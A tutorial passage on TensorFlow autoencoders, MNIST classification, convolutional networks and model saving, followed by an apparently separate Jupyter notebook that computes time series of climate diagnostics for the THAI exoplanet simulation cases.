over the course of training. 
examples = ds.X[:100] # We'll store the reconstructions in a list imgs = [] fig, ax = plt.subplots(1, 1) for epoch_i in range(n_epochs): for batch_X, _ in ds.train.next_batch(): sess.run(optimizer, feed_dict={X: batch_X - mean_img}) recon = sess.run(Y, feed_dict={X: examples - mean_img}) recon = np.clip((recon + mean_img).reshape((-1, 28, 28)), 0, 255) img_i = montage(recon).astype(np.uint8) imgs.append(img_i) ax.imshow(img_i, cmap='gray') fig.canvas.draw() print(epoch_i, sess.run(cost, feed_dict={X: batch_X - mean_img})) gif.build_gif(imgs, saveto='ae.gif', cmap='gray') ipyd.Image(url='ae.gif?{}'.format(np.random.rand()), height=500, width=500) ``` <a name="convolutional-autoencoder"></a> ## Convolutional Autoencoder To get even better encodings, we can also try building a convolutional network. Why would a convolutional network perform any different to a fully connected one? Let's see what we were doing in the fully connected network. For every pixel in our input, we have a set of weights corresponding to every output neuron. Those weights are unique to each pixel. Each pixel gets its own row in the weight matrix. That really doesn't make a lot of sense, since we would guess that nearby pixels are probably not going to be so different. And we're not really encoding what's happening around that pixel, just what that one pixel is doing. In a convolutional model, we're explicitly modeling what happens around a pixel. And we're using the exact same convolutions no matter where in the image we are. But we're going to use a lot of different convolutions. Recall in session 1 we created a Gaussian and Gabor kernel and used this to convolve an image to either blur it or to accentuate edges. Armed with what you know now, you could try to train a network to learn the parameters that map an untouched image to a blurred or edge filtered version of it. What you should find is the kernel will look sort of like what we built by hand. I'll leave that as an exercise for you. 
But in fact, that's too easy really. That's just 1 filter you would have to learn. We're going to see how we can use many convolutional filters, way more than 1, and how it will help us to encode the MNIST dataset. To begin we'll need to reset the current graph and start over. ``` from tensorflow.python.framework.ops import reset_default_graph reset_default_graph() # And we'll create a placeholder in the tensorflow graph that will be able to get any number of n_feature inputs. X = tf.placeholder(tf.float32, [None, n_features]) ``` Since `X` is currently `[batch, height*width]`, we need to reshape it to a 4-D tensor to use it in a convolutional graph. Remember back to the first session that in order to perform convolution, we have to use 4-dimensional tensors describing the: `N x H x W x C` We'll reshape our input placeholder by telling the `shape` parameter to be these new dimensions. However, since our batch dimension is `None`, we cannot reshape without using the special value `-1`, which says that the size of that dimension should be computed so that the total size remains constant. Since we haven't defined the batch dimension's shape yet, we use `-1` to denote this dimension should not change size. ``` X_tensor = tf.reshape(X, [-1, 28, 28, 1]) ``` We'll now setup the first convolutional layer. Remember from Session 2 that the weight matrix for convolution should be `[height x width x input_channels x output_channels]` Think a moment about how this is different to the fully connected network. In the fully connected network, every pixel was being multiplied by its own weight to every other neuron. With a convolutional network, we use the extra dimensions to allow the same set of filters to be applied everywhere across an image. This is also known in the literature as weight sharing, since we're sharing the weights no matter where in the input we are. That's unlike the fully connected approach, which has unique weights for every pixel. 
What's more is after we've performed the convolution, we've retained the spatial organization of the input. We still have dimensions of height and width. That's again unlike the fully connected network which effectively shuffles or takes into account information from everywhere, not at all caring about where anything is. That can be useful or not depending on what we're trying to achieve. Often, it is something we might want to do after a series of convolutions to encode translation invariance. Don't worry about that for now. With MNIST especially we won't need to do that since all of the numbers are in the same position. Now with our tensor ready, we're going to do what we've just done with the fully connected autoencoder. Except, instead of performing matrix multiplications, we're going to create convolution operations. To do that, we'll need to decide on a few parameters including the filter size, how many convolution filters we want, and how many layers we want. I'll start with a fairly small network, and let you scale this up in your own time. ``` n_filters = [16, 16, 16] filter_sizes = [4, 4, 4] ``` Now we'll create a loop to create every layer's convolution, storing the convolution operations we create so that we can do the reverse. ``` current_input = X_tensor # notice instead of having 784 as our input features, we're going to have # just 1, corresponding to the number of channels in the image. # We're going to use convolution to find 16 filters, or 16 channels of information in each spatial location we perform convolution at. n_input = 1 # We're going to keep every matrix we create so let's create a list to hold them all Ws = [] shapes = [] # We'll create a for loop to create each layer: for layer_i, n_output in enumerate(n_filters): # just like in the last session, # we'll use a variable scope to help encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. 
with tf.variable_scope("encoder/layer/{}".format(layer_i)): # we'll keep track of the shapes of each layer # As we'll need these for the decoder shapes.append(current_input.get_shape().as_list()) # Create a weight matrix which will increasingly reduce # down the amount of information in the input by performing # a matrix multiplication W = tf.get_variable( name='W', shape=[ filter_sizes[layer_i], filter_sizes[layer_i], n_input, n_output], initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02)) # Now we'll convolve our input by our newly created W matrix h = tf.nn.conv2d(current_input, W, strides=[1, 2, 2, 1], padding='SAME') # And then use a relu activation function on its output current_input = tf.nn.relu(h) # Finally we'll store the weight matrix so we can build the decoder. Ws.append(W) # We'll also replace n_input with the current n_output, so that on the # next iteration, our new number inputs will be correct. n_input = n_output ``` Now with our convolutional encoder built and the encoding weights stored, we'll reverse the whole process to decode everything back out to the original image. ``` # We'll first reverse the order of our weight matrices Ws.reverse() # and the shapes of each layer shapes.reverse() # and the number of filters (which is the same but could have been different) n_filters.reverse() # and append the last filter size which is our input image's number of channels n_filters = n_filters[1:] + [1] print(n_filters, filter_sizes, shapes) # and then loop through our convolution filters and get back our input image # we'll enumerate the shapes list to get us there for layer_i, shape in enumerate(shapes): # we'll use a variable scope to help encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. 
with tf.variable_scope("decoder/layer/{}".format(layer_i)): # Create a weight matrix which will increasingly reduce # down the amount of information in the input by performing # a matrix multiplication W = Ws[layer_i] # Now we'll convolve by the transpose of our previous convolution tensor h = tf.nn.conv2d_transpose(current_input, W, tf.pack([tf.shape(X)[0], shape[1], shape[2], shape[3]]), strides=[1, 2, 2, 1], padding='SAME') # And then use a relu activation function on its output current_input = tf.nn.relu(h) ``` Now we have the reconstruction through the network: ``` Y = current_input Y = tf.reshape(Y, [-1, n_features]) ``` We can measure the cost and train exactly like before with the fully connected network: ``` cost = tf.reduce_mean(tf.reduce_mean(tf.squared_difference(X, Y), 1)) learning_rate = 0.001 # pass learning rate and cost to optimize optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost) # Session to manage vars/train sess = tf.Session() sess.run(tf.initialize_all_variables()) # Some parameters for training batch_size = 100 n_epochs = 5 # We'll try to reconstruct the same first 100 images and show how # The network does over the course of training. examples = ds.X[:100] # We'll store the reconstructions in a list imgs = [] fig, ax = plt.subplots(1, 1) for epoch_i in range(n_epochs): for batch_X, _ in ds.train.next_batch(): sess.run(optimizer, feed_dict={X: batch_X - mean_img}) recon = sess.run(Y, feed_dict={X: examples - mean_img}) recon = np.clip((recon + mean_img).reshape((-1, 28, 28)), 0, 255) img_i = montage(recon).astype(np.uint8) imgs.append(img_i) ax.imshow(img_i, cmap='gray') fig.canvas.draw() print(epoch_i, sess.run(cost, feed_dict={X: batch_X - mean_img})) gif.build_gif(imgs, saveto='conv-ae.gif', cmap='gray') ipyd.Image(url='conv-ae.gif?{}'.format(np.random.rand()), height=500, width=500) ``` <a name="denoising-autoencoder"></a> ## Denoising Autoencoder The denoising autoencoder is a very simple extension to an autoencoder. 
Instead of seeing the input, it is corrupted, for instance by masked noise, but the reconstruction loss is still measured on the original uncorrupted image. What this does is lets the model try to interpret occluded or missing parts of the thing it is reasoning about. It would make sense for many models, that not every datapoint in an input is necessary to understand what is going on. Denoising autoencoders try to enforce that, and as a result, the encodings at the middle most layer are often far more representative of the actual classes of different objects. In the resources section, you'll see that I've included a general framework autoencoder allowing you to use either a fully connected or convolutional autoencoder, and whether or not to include denoising. If you're interested in the mechanics of how this works, I encourage you to have a look at the code. <a name="variational-autoencoders"></a> ## Variational Autoencoders A variational autoencoder extends the traditional autoencoder by using an additional layer called the variational layer. It is actually two networks that are cleverly connected using a simple reparameterization trick, to help the gradient flow through both networks during backpropagation allowing both to be optimized. We don't have enough time to get into the details, but I'll try to quickly explain: it tries to optimize the likelihood that a particular distribution would create an image, rather than trying to optimize simply the L2 loss at the end of the network. Or put another way it hopes that there is some distribution that a distribution of image encodings could be defined as. This is a bit tricky to grasp, so don't worry if you don't understand the details. The major difference to hone in on is that instead of optimizing distance in the input space of pixel to pixel distance, which is actually quite arbitrary if you think about it... why would we care about the exact pixels being the same? 
Human vision would not care for most cases, if there was a slight translation of our image, then the distance could be very high, but we would never be able to tell the difference. So intuitively, measuring error based on raw pixel to pixel distance is not such a great approach. Instead of relying on raw pixel differences, the variational autoencoder tries to optimize two networks. One which says that given my pixels, I am pretty sure I can encode them to the parameters of some well known distribution, like a set of Gaussians, instead of some arbitrary density of values. And then I can optimize the latent space, by saying that particular distribution should be able to represent my entire dataset, and I try to optimize the likelihood that it will create the images I feed through a network. So distance is somehow encoded in this latent space. Of course I appreciate that is a difficult concept so forgive me for not being able to expand on it in more detail. But to make up for the lack of time and explanation, I've included this model under the resources section for you to play with! Just like the "vanilla" autoencoder, this one supports both fully connected, convolutional, and denoising models. This model performs so much better than the vanilla autoencoder. In fact, it performs so well that I can even manage to encode the majority of MNIST into 2 values. The following visualization demonstrates the learning of a variational autoencoder over time. <mnist visualization> There are of course a lot more interesting applications of such a model. You could for instance, try encoding a more interesting dataset, such as CIFAR which you'll find a wrapper for in the libs/datasets module. <TODO: produce GIF visualization madness> Or the celeb faces dataset: <celeb dataset> Or you could try encoding an entire movie. We tried it with the copyleft movie, "Sita Sings The Blues". 
Every 2 seconds, we stored an image of this movie, and then fed all of these images to a deep variational autoencoder. This is the result. <show sita sings the blues training images> And I'm sure we can get closer with deeper nets and more training time. But notice how in both celeb faces and sita sings the blues, the decoding is really blurred. That is because of the assumption of the underlying representational space. We're saying the latent space must be modeled as a gaussian, and those factors must be distributed as a gaussian. This enforces a sort of discretization of my representation, enforced by the noise parameter of the gaussian. In the last session, we'll see how we can avoid this sort of blurred representation and get even better decodings using a generative adversarial network. For now, consider the applications that this method opens up. Once you have an encoding of a movie, or image dataset, you are able to do some very interesting things. You have effectively stored all the representations of that movie, although it's not perfect of course. But, you could for instance, see how another movie would be interpreted by the same network. That's similar to what Terrance Broad did for his project on reconstructing blade runner and a scanner darkly, though he made use of both the variational autoencoder and the generative adversarial network. We're going to look at that network in more detail in the last session. We'll also look at how to properly handle very large datasets like celeb faces or the one used here to create the sita sings the blues autoencoder. Taking every 60th frame of Sita Sings The Blues gives you about 300k images. And that's a lot of data to try and load in all at once. We had to size it down considerably, and make use of what's called a tensorflow input pipeline. 
I've included all the code for training this network, which took about 1 day on a fairly powerful machine, but I will not get into the details of the image pipeline bits until session 5 when we look at generative adversarial networks. I'm delaying this because we'll need to learn a few things along the way before we can build such a network. <a name="predicting-image-labels"></a> # Predicting Image Labels We've just seen a variety of types of autoencoders and how they are capable of compressing information down to its inner most layer while still being able to retain most of the interesting details. Considering that the CelebNet dataset was nearly 200 thousand images of 64 x 64 x 3 pixels, and we're able to express those with just an inner layer of 50 values, that's just magic basically. Magic. Okay, let's move on now to a different type of learning often called supervised learning. Unlike what we just did, which is work with a set of data and not have any idea what that data should be *labeled* as, we're going to explicitly tell the network what we want it to be labeled by saying what the network should output for a given input. In the previous case, we just had a set of `Xs`, our images. Now, we're going to have `Xs` and `Ys` given to us, and use the `Xs` to try and output the `Ys`. With MNIST, the outputs of each image are simply what numbers are drawn in the input image. The wrapper for grabbing this dataset from the libs module takes an additional parameter which I didn't talk about called `one_hot`. 
``` from libs import datasets # ds = datasets.MNIST(one_hot=True) ``` To see what this is doing, let's compare setting it to false versus true: ``` ds = datasets.MNIST(one_hot=False) # let's look at the first label print(ds.Y[0]) # okay and what does the input look like plt.imshow(np.reshape(ds.X[0], (28, 28)), cmap='gray') # great it is just the label of the image plt.figure() # Let's look at the next one just to be sure print(ds.Y[1]) # Yea the same idea plt.imshow(np.reshape(ds.X[1], (28, 28)), cmap='gray') ``` And now let's look at what the one hot version looks like: ``` ds = datasets.MNIST(one_hot=True) plt.figure() plt.imshow(np.reshape(ds.X[0], (28, 28)), cmap='gray') print(ds.Y[0]) # array([ 0., 0., 0., 0., 0., 0., 0., 1., 0., 0.]) # Woah a bunch more numbers. 10 to be exact, which is also the number # of different labels in the dataset. plt.imshow(np.reshape(ds.X[1], (28, 28)), cmap='gray') print(ds.Y[1]) # array([ 0., 0., 0., 1., 0., 0., 0., 0., 0., 0.]) ``` So instead of have a number from 0-9, we have 10 numbers corresponding to the digits, 0-9, and each value is either 0 or 1. Whichever digit the image represents is the one that is 1. To summarize, we have all of the images of the dataset stored as: `n_observations` x `n_features` tensor (n-dim array) ``` print(ds.X.shape) ``` And labels stored as `n_observations` x `n_labels` where each observation is a one-hot vector, where only one element is 1 indicating which class or label it is. ``` print(ds.Y.shape) print(ds.Y[0]) ``` <a name="one-hot-encoding"></a> ## One-Hot Encoding Remember in the last session, we saw how to build a network capable of taking 2 inputs representing the row and column of an image, and predicting 3 outputs, the red, green, and blue colors. Just like in our unsupervised model, instead of having 2 inputs, we'll now have 784 inputs, the brightness of every pixel in our image. 
And instead of 3 outputs, like in our painting network from last session, or the 784 outputs we had in our unsupervised MNIST network, we'll now have 10 outputs representing the one-hot encoding of its label. So why don't we just have 1 output? A number from 0-9? Wouldn't having 10 different outputs instead of just 1 be harder to learn? Consider how we normally train the network. We have to give it a cost which it will use to minimize. What could our cost be if our output was just a single number, 0-9? We would still have the true label, and the predicted label. Could we just take the subtraction of the two values? e.g. the network predicted 0, but the image was really the number 8. Okay so then our distance could be: ``` # cost = tf.reduce_sum(tf.abs(y_pred - y_true)) ``` But in this example, the cost would be 8. If the image was a 4, and the network predicted a 0 again, the cost would be 4... but isn't the network still just as wrong, not half as much as when the image was an 8? In a one-hot encoding, the cost would be 1 for both, meaning they are both just as wrong. So we're able to better measure the cost, by separating each class's label into its own dimension. <a name="using-regression-for-classification"></a> ## Using Regression for Classification The network we build will be trained to output values between 0 and 1. They won't output exactly a 0 or 1. But rather, they are able to produce any value. 0, 0.1, 0.2, ... and that means the networks we've been using are actually performing regression. In regression, the output is "continuous", rather than "discrete". The difference is this: a *discrete* output means the network can only output one of a few things. Like, 0, 1, 2, or 3, and that's it. But a *continuous* output means it can output any real number. In order to perform what's called classification, we're just simply going to look at whichever value is the highest in our one hot encoding. 
In order to do that a little better, we're actually going to interpret our one hot encodings as probabilities by scaling the total output by their sum. What this does is allows us to understand that as we grow more confident in one prediction, we should grow less confident in all other predictions. We only have so much certainty to go around, enough to add up to 1. If we think the image might also be the number 1, then we lose some certainty of it being the number 0. It turns out there is a better cost function than simply measuring the distance between two vectors when they are probabilities. It's called cross entropy: \begin{align} \Large{H(x) = -\sum{y_{\text{t}}(x) * \log(y_{\text{p}}(x))}} \end{align} What this equation does is measures the similarity of our prediction with our true distribution, by exponentially increasing error whenever our prediction gets closer to 1 when it should be 0, and similarly by exponentially increasing error whenever our prediction gets closer to 0, when it should be 1. I won't go into more detail here, but just know that we'll be using this measure instead of a normal distance measure. <a name="fully-connected-network"></a> ## Fully Connected Network ### Defining the Network Let's see how our one hot encoding and our new cost function will come into play. We'll create our network for predicting image classes in pretty much the same way we've created previous networks: We will have as input to the network 28 x 28 values. ``` import tensorflow as tf from libs import datasets ds = datasets.MNIST(split=[0.8, 0.1, 0.1]) n_input = 28 * 28 ``` As output, we have our 10 one-hot-encoding values ``` n_output = 10 ``` We're going to create placeholders for our tensorflow graph. We're going to set the first dimension to `None`. Remember from our unsupervised model, this is just something special for placeholders which tells tensorflow "let this dimension be any possible value". 1, 5, 100, 1000, it doesn't matter. 
Since we're going to pass our entire dataset in batches we'll need this to be say 100 images at a time. But we'd also like to be able to send in only 1 image and see what the prediction of the network is. That's why we let this dimension be flexible. ``` X = tf.placeholder(tf.float32, [None, n_input]) ``` For the output, we'll have `None` again, since for every input, we'll have the same number of images that have outputs. ``` Y = tf.placeholder(tf.float32, [None, n_output]) ``` Now we'll connect our input to the output with a linear layer. Instead of `relu`, we're going to use `softmax`. This will perform our exponential scaling of the outputs and make sure the output sums to 1, making it a probability. ``` # We'll use the linear layer we created in the last session, which I've stored in the libs file: # NOTE: The lecture used an older version of this function which had a slightly different definition. from libs import utils Y_pred, W = utils.linear( x=X, n_output=n_output, activation=tf.nn.softmax, name='layer1') ``` And then we write our loss function as the cross entropy. And then we'll give our optimizer the `cross_entropy` measure just like we would with GradientDescent. The formula for cross entropy is: \begin{align} \Large{H(x) = -\sum{\text{Y}_{\text{true}} * log(\text{Y}_{pred})}} \end{align} ``` # We add 1e-12 because the log is undefined at 0. cross_entropy = -tf.reduce_sum(Y * tf.log(Y_pred + 1e-12)) optimizer = tf.train.AdamOptimizer(0.001).minimize(cross_entropy) ``` To determine the correct class from our regression output, we have to take the maximum index. ``` predicted_y = tf.argmax(Y_pred, 1) actual_y = tf.argmax(Y, 1) ``` We can then measure the accuracy by seeing whenever these are equal. Note, this is just for us to see, and is not at all used to "train" the network! 
``` correct_prediction = tf.equal(predicted_y, actual_y) accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) ``` ### Training the Network The rest of the code will be exactly the same as before. We chunk the training dataset into `batch_size` chunks, and let these images help train the network over a number of iterations. ``` sess = tf.Session() sess.run(tf.initialize_all_variables()) # Now actually do some training: batch_size = 50 n_epochs = 5 for epoch_i in range(n_epochs): for batch_xs, batch_ys in ds.train.next_batch(): sess.run(optimizer, feed_dict={ X: batch_xs, Y: batch_ys }) valid = ds.valid print(sess.run(accuracy, feed_dict={ X: valid.images, Y: valid.labels })) # Print final test accuracy: test = ds.test print(sess.run(accuracy, feed_dict={ X: test.images, Y: test.labels })) ``` What we should see is the accuracy being printed after each "epoch", or after every run over the entire dataset. Since we're using batches, we use the notion of an "epoch" to denote whenever we've gone through the entire dataset. <a name="inspecting-the-network"></a> ### Inspecting the Trained Network Let's try and now inspect *how* the network is accomplishing this task. We know that our network is a single matrix multiplication of our 784 pixel values. The weight matrix, `W`, should therefore have 784 rows. As outputs, it has 10 values. So the matrix is composed in the `linear` function as `n_input` x `n_output` values. So the matrix is 784 rows x 10 columns. <TODO: graphic w/ wacom showing network and matrix multiplication and pulling out single neuron/column> In order to get this matrix, we could have had our `linear` function return the `tf.Tensor`. 
But since everything is part of the tensorflow graph, and we've started using nice names for all of our operations, we can actually find this tensor using tensorflow: ``` # We first get the graph that we used to compute the network g = tf.get_default_graph() # And can inspect everything inside of it [op.name for op in g.get_operations()] ``` Looking at the names of the operations, we see there is one `linear/W`. But this is the `tf.Operation`. Not the `tf.Tensor`. The tensor is the result of the operation. To get the result of the operation, we simply add ":0" to the name of the operation: ``` W = g.get_tensor_by_name('layer1/W:0') ``` We can use the existing session to compute the current value of this tensor: ``` W_arr = np.array(W.eval(session=sess)) print(W_arr.shape) ``` And now we have our tensor! Let's try visualizing every neuron, or every column of this matrix: ``` fig, ax = plt.subplots(1, 10, figsize=(20, 3)) for col_i in range(10): ax[col_i].imshow(W_arr[:, col_i].reshape((28, 28)), cmap='coolwarm') ``` We're going to use the `coolwarm` color map, which will use "cool" values, or blue-ish colors for low values. And "warm" colors, red, basically, for high values. So what we begin to see is that there is a weighting of all the input values, where pixels that are likely to describe that number are being weighted high, and pixels that are not likely to describe that number are being weighted low. By summing all of these multiplications together, the network is able to begin to predict what number is in the image. This is not a very good network though, and the representations it learns could still do a much better job. We were only right about 93% of the time according to our accuracy. State of the art models will get about 99.9% accuracy. <a name="convolutional-networks"></a> ## Convolutional Networks To get better performance, we can build a convolutional network. We've already seen how to create a convolutional network with our unsupervised model. 
We're going to make the same modifications here to help us predict the digit labels in MNIST. ### Defining the Network I'll first reset the current graph, so we can build a new one. We'll use tensorflow's nice helper function for doing this. ``` from tensorflow.python.framework.ops import reset_default_graph reset_default_graph() ``` And just to confirm, let's see what's in our graph: ``` # We first get the graph that we used to compute the network g = tf.get_default_graph() # And can inspect everything inside of it [op.name for op in g.get_operations()] ``` Great. Empty. Now let's get our dataset, and create some placeholders like before: ``` # We'll have placeholders just like before which we'll fill in later. ds = datasets.MNIST(one_hot=True, split=[0.8, 0.1, 0.1]) X = tf.placeholder(tf.float32, [None, 784]) Y = tf.placeholder(tf.float32, [None, 10]) ``` Since `X` is currently `[batch, height*width]`, we need to reshape to a 4-D tensor to use it in a convolutional graph. Remember, in order to perform convolution, we have to use 4-dimensional tensors describing the: `N x H x W x C` We'll reshape our input placeholder by telling the `shape` parameter to be these new dimensions and we'll use `-1` to denote this dimension should not change size. ``` X_tensor = tf.reshape(X, [-1, 28, 28, 1]) ``` We'll now setup the first convolutional layer. Remember that the weight matrix for convolution should be `[height x width x input_channels x output_channels]` Let's create 32 filters. That means every location in the image, depending on the stride I set when we perform the convolution, will be filtered by this many different kernels. In session 1, we convolved our image with just 2 different types of kernels. Now, we're going to let the computer try to find out what 32 filters helps it map the input to our desired output via our training signal. 
``` filter_size = 5 n_filters_in = 1 n_filters_out = 32 W_1 = tf.get_variable( name='W', shape=[filter_size, filter_size, n_filters_in, n_filters_out], initializer=tf.random_normal_initializer()) ``` Bias is always `[output_channels]` in size. ``` b_1 = tf.get_variable( name='b', shape=[n_filters_out], initializer=tf.constant_initializer()) ``` Now we can build a graph which does the first layer of convolution: We define our stride as `batch` x `height` x `width` x `channels`. This has the effect of resampling the image down to half of the size. ``` h_1 = tf.nn.relu( tf.nn.bias_add( tf.nn.conv2d(input=X_tensor, filter=W_1, strides=[1, 2, 2, 1], padding='SAME'), b_1)) ``` And just like the first layer, add additional layers to create a deep net. ``` n_filters_in = 32 n_filters_out = 64 W_2 = tf.get_variable( name='W2', shape=[filter_size, filter_size, n_filters_in, n_filters_out], initializer=tf.random_normal_initializer()) b_2 = tf.get_variable( name='b2', shape=[n_filters_out], initializer=tf.constant_initializer()) h_2 = tf.nn.relu( tf.nn.bias_add( tf.nn.conv2d(input=h_1, filter=W_2, strides=[1, 2, 2, 1], padding='SAME'), b_2)) ``` 4d -> 2d ``` # We'll now reshape so we can connect to a fully-connected/linear layer: h_2_flat = tf.reshape(h_2, [-1, 7 * 7 * n_filters_out]) ``` Create a fully-connected layer: ``` # NOTE: This uses a slightly different version of the linear function than the lecture! h_3, W = utils.linear(h_2_flat, 128, activation=tf.nn.relu, name='fc_1') ``` And one last fully-connected layer which will give us the correct number of outputs, and use a softmax to expoentially scale the outputs and convert them to a probability: ``` # NOTE: This uses a slightly different version of the linear function than the lecture! Y_pred, W = utils.linear(h_3, n_output, activation=tf.nn.softmax, name='fc_2') ``` <TODO: Draw as graphical representation> ### Training the Network The rest of the training process is the same as the previous network. 
We'll define loss/eval/training functions: ``` cross_entropy = -tf.reduce_sum(Y * tf.log(Y_pred + 1e-12)) optimizer = tf.train.AdamOptimizer().minimize(cross_entropy) ``` Monitor accuracy: ``` correct_prediction = tf.equal(tf.argmax(Y_pred, 1), tf.argmax(Y, 1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float')) ``` And create a new session to actually perform the initialization of all the variables: ``` sess = tf.Session() sess.run(tf.initialize_all_variables()) ``` Then we'll train in minibatches and report accuracy: ``` batch_size = 50 n_epochs = 10 for epoch_i in range(n_epochs): for batch_xs, batch_ys in ds.train.next_batch(): sess.run(optimizer, feed_dict={ X: batch_xs, Y: batch_ys }) valid = ds.valid print(sess.run(accuracy, feed_dict={ X: valid.images, Y: valid.labels })) # Print final test accuracy: test = ds.test print(sess.run(accuracy, feed_dict={ X: test.images, Y: test.labels })) ``` <TODO: Fun timelapse of waiting> ### Inspecting the Trained Network Let's take a look at the kernels we've learned using the following montage function, similar to the one we've been using for creating image montages, except this one is suited for the dimensions of convolution kernels instead of 4-d images. So it has the height and width first, unlike images which have batch then height then width. We'll use this function to visualize every convolution kernel in the first and second layers of our network. ``` from libs.utils import montage_filters W1 = sess.run(W_1) plt.figure(figsize=(10, 10)) plt.imshow(montage_filters(W1), cmap='coolwarm', interpolation='nearest') ``` What we're looking at are all of the convolution kernels that have been learned. Compared to the previous network we've learned, it is much harder to understand what's happening here. But let's try and explain these a little more. The kernels that have been automatically learned here are responding to edges of different scales, orientations, and rotations. 
It's likely these are really describing parts of digits, or the strokes that make up digits.
When you are ready to deploy or hand out your network to others, you don't want to pass checkpoints around as they contain a lot of unnecessary information, and it also requires you to still write code to create your network. Instead, you can create a protobuf which contains the definition of your graph and the model's weights. Let's see how to do both: <a name="checkpoint"></a> ## Checkpoint Creating a checkpoint requires you to have already created a set of operations in your tensorflow graph. Once you've done this, you'll create a session like normal and initialize all of the variables. After this, you create a `tf.train.Saver` which can restore a previously saved checkpoint, overwriting all of the variables with your saved parameters. ``` import os sess = tf.Session() init_op = tf.initialize_all_variables() saver = tf.train.Saver() sess.run(init_op) if os.path.exists("model.ckpt"): saver.restore(sess, "model.ckpt") print("Model restored.") ``` Creating the checkpoint is easy. After a few iterations of training, depending on your application say between 1/10 of the time to train the full model, you'll want to write the saved model. You can do this like so: ``` save_path = saver.save(sess, "./model.ckpt") print("Model saved in file: %s" % save_path) ``` <a name="protobuf"></a> ## Protobuf The second way of saving a model is really useful for when you don't want to pass around the code for producing the tensors or computational graph itself. It is also useful for moving the code to deployment or for use in the C++ version of Tensorflow. To do this, you'll want to run an operation to convert all of your trained parameters into constants. Then, you'll create a second graph which copies the necessary tensors, extracts the subgraph, and writes this to a model. The summarized code below shows you how you could use a checkpoint to restore your models parameters, and then export the saved model as a protobuf. 
``` path='./' ckpt_name = 'model.ckpt' fname = 'model.tfmodel' dst_nodes = ['Y'] g_1 = tf.Graph() with tf.Session(graph=g_1) as sess: x = tf.placeholder(tf.float32, shape=(1, 224, 224, 3)) # Replace this with some code which will create your tensorflow graph: net = create_network() sess.run(tf.initialize_all_variables()) saver.restore(sess, ckpt_name) graph_def = tf.python.graph_util.convert_variables_to_constants( sess, sess.graph_def, dst_nodes) g_2 = tf.Graph() with tf.Session(graph=g_2) as sess: tf.train.write_graph( tf.python.graph_util.extract_sub_graph( graph_def, dst_nodes), path, fname, as_text=False) ``` When you wanted to import this model, now you wouldn't need to refer to the checkpoint or create the network by specifying its placeholders or operations. Instead, you'd use the `import_graph_def` operation like so: ``` with open("model.tfmodel", mode='rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) tf.import_graph_def(net['graph_def'], name='model') ``` <a name="wrap-up"></a> # Wrap Up In the next session, we'll learn some very powerful techniques for exploring the representations learned by these kernels, and how we can better understand what they are learning. We'll look at state of the art deep networks for image recognition and interrogate what they've learned using techniques that led the public to Deep Dream. <a name="reading"></a> # Reading Bourlard, H.; Kamp, Y. (1988). "Auto-association by multilayer perceptrons and singular value decomposition". Biological Cybernetics 59 (4–5): 291–294. G. E. Hinton, R. R. Salakhutdinov. Reducing the Dimensionality of Data with Neural Networks. Science, 28 Jul 2006. Vol. 313, Issue 5786, pp. 504-507. DOI: 10.1126/science.1127647. http://science.sciencemag.org/content/313/5786/504.abstract Bengio, Y. (2009). "Learning Deep Architectures for AI". Foundations and Trends in Machine Learning 2. 
doi:10.1561/2200000006 Vincent, Pascal; Larochelle, Hugo; Lajoie, Isabelle; Bengio, Yoshua; Manzagol, Pierre-Antoine (2010). "Stacked Denoising Autoencoders: Learning Useful Representations in a Deep Network with a Local Denoising Criterion". The Journal of Machine Learning Research 11: 3371–3408. Auto-Encoding Variational Bayes, Kingma, D.P. and Welling, M., ArXiv e-prints, 2013 http://arxiv.org/abs/1312.6114
github_jupyter
# Save time series of spatially collapsed diagnostics ``` import warnings warnings.filterwarnings("ignore") # noqa # Data analysis and viz libraries import dask import numpy as np import xarray as xr from dask.distributed import Client # Progress bar from tqdm.notebook import tqdm # Local modules import mypaths import names from calc import ( altitude_of_cloud_mmr_maximum, cloud_path_total, dayside_mean, get_time_rel_days, global_mean, meridional_mean, nightside_mean, open_ocean_frac, sfc_temp, spatial_mean, terminator_mean, ) from commons import MODELS from load_thai import LOAD_CONF from model_exocam import calc_alt_exocam, calc_pres_exocam from model_lmdg import calc_alt_lmdg ``` Start a local `dask` cluster. ``` client = Client(processes=True, n_workers=4, threads_per_worker=1) client ``` ## Choose case ``` THAI_case = "Hab2" if THAI_case.endswith("1"): import const_ben1_hab1 as const else: import const_ben2_hab2 as const KW_CONST = dict( mw_ratio=const.mw_ratio, dry_air_gas_constant=const.rgas, condens_gas_constant=const.rvapor, gravity=const.gplanet, ) AGGR_DICT = dict(g=global_mean, d=dayside_mean, n=nightside_mean, t=terminator_mean) DIAGS = { "t_sfc": { "func": sfc_temp, }, "ocean_frac": { "func": open_ocean_frac, }, "cwp": { "func": cloud_path_total, }, "alt_cld_mmr_max": { "func": altitude_of_cloud_mmr_maximum, }, } for model_key in tqdm(MODELS.keys()): model_names = getattr(names, model_key.lower()) with LOAD_CONF[model_key]["loader"](THAI_case) as ds: if model_key == "ExoCAM": ds[model_names.pres] = calc_pres_exocam(ds) ds["z"] = calc_alt_exocam(ds, case=THAI_case, **KW_CONST) elif model_key == "LMDG": ds["level_height"] = calc_alt_lmdg(ds, case=THAI_case, **KW_CONST) ds_out = {} for diag_key, diag_dict in tqdm(DIAGS.items(), leave=False): if diag_key == "t_sfc": args = (ds, model_key, const) else: args = (ds, model_key) _arr = diag_dict["func"](*args) for aggr_key, aggr_func in tqdm(AGGR_DICT.items(), leave=False): ds_out[f"{diag_key}_{aggr_key}"] = ( 
aggr_func(_arr, model_names).sortby(model_names.t).compute() ) xr.Dataset(ds_out).to_netcdf( mypaths.datadir / model_key / f"{THAI_case}_time_series_{model_key}.nc" ) client.close() ```
github_jupyter
